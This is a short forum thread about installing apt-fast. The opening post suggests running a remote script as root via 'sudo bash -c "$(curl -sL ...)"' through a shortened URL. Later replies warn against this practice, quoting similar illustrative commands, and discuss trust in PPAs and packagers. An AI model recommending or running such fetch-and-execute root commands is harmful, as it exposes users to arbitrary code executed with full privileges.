apt-fast upgrade

Forum Forums General Tips and Tricks apt-fast upgrade

  • This topic has 4 replies, 2 voices, and was last updated Feb 21-1:02 pm by Anonymous.
Viewing 5 posts - 1 through 5 (of 5 total)
  • Author
    Posts
  • #6798
    Member
    koolstofje

      Someone confesses with apt-fast upgrade?
      Download packages is much faster here ..

      sudo apt-get install curl git

      sudo apt-get install aria2

      sudo /bin/bash -c “$(curl -sL http://git.io/vokNn)”

      #6799
      Anonymous

        No!
        THAT IS A TERRIBLE “TIP”

        DOWNLOADING (OR CURL OR WGET) A SCRIPT FROM THE INTERNET
        (OR A PACKAGE NOT KNOWN TO WORK WITH THE LINUX DISTRUBUTION INSTALLED ON YOUR SYSTEM)
        AND BLINDLY EXECUTING IT, WITH ROOT PERMISSION,
        IS A BAD (FOOLISH) PRACTICE !

        What are the security measures to protect a Linux machine from Ransomware?

        ”hardening” is only half a solution.
        Here are a few “common sense” BestPractices:

        Be mindful when running ‘code found online’
        and
        Never copy/paste web-snipped code directly into terminal !
        ref: http://nakedsecurity.sophos.com/2016/05/26/why-you-cant-trust-things-you-cut-and-paste-from-web-pages/
        ref: http://thejh.net/misc/website-terminal-copy-paste
        ref: http://news.ycombinator.com/item?id=5508225
        ref: http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/

        Similarly, I would never paste a found-on-the-web commandline involving curl (or wget) …and sudo (and/or sh or `bash or other shell)
        No! curl http:/gitmeuptodate/iwantapony ………. | sudo -h somescript.sh
        No! sudo /bin/bash -c “$(curl -sL http://happysite.com/bestest_evah_fix0r_freestuff)”

        After downloading “codez” or “scripts” and before executing, inspect the content of the code to ensure it is safe.
        If you can’t understand the program’s code, instead of blindly executing it, ask a trusted friend to inspect its content !

        #6800
        Anonymous

          Some folks will disagree with the cautionary tone expressed in my post, above.
          Some folks, for the sake of “convenience” (instant gratification) will ignore the cautionary tone expressed in my post, above.

          Some “official” project sites and/or github repos
          (operated by hipsters, targeting users seeking instant graBification)
          will explicitly instruct “easy! To install, just paste this handy curl sudo bash and voilà…”

          NONETHELESS, DOING SO IS A BAD (FOOLISH) PRACTICE !

          Sigh.
          Those who didn’t learn from (too young to remember?) the decades-long plague of windoze malware
          are destined to repeat it.

          #6802
          Member
          koolstofje

            Yes you are right
            so far everything is ok here hehe

            #6804
            Anonymous

              Well, thanks for providing opportunity for me to post here that cautionary “Public Service Announcement” (already posted to MX forum).
              I’ve tried to present “both sides”; the practice of trading security for convenience is arguably not an issue of right vs wrong.

              Use of (installation of software from) PPAs merits the same caution
              (accountability ~~ can you even determine the given name of person(s) uploading to a PPA repository?)
              (trustworthiness ~~ is a given PPA hosted on secure infrastructure or, eeeeek!, a vulnerable shared-hosting webserver?)
              yet across the linux ecosystem we can notice growing acceptance of their use.

              Sadly, across distros, this naïveté is often at play behind-the-scenes as well.
              A “package maintainer” (or user of a distro employing source-pased pkg management) conveniently clicks/runs a pkgbuild script
              which oh-so-conveniently downloads from github|ppa|wherever and compiles and installs, or crams into an installable package.
              Even if downloaded “via https, from a trusted source”, doesn’t each package maintainer take pride in fulfilling the role entrusted to them
              by AT LEAST inspecting the configurable default preferences within the downloaded source package?
              No, too often they do not; they engage in “trading security for convenience” due to time constraints — much work, and too few (volunteer) packagers.

            Viewing 5 posts - 1 through 5 (of 5 total)
            • You must be logged in to reply to this topic.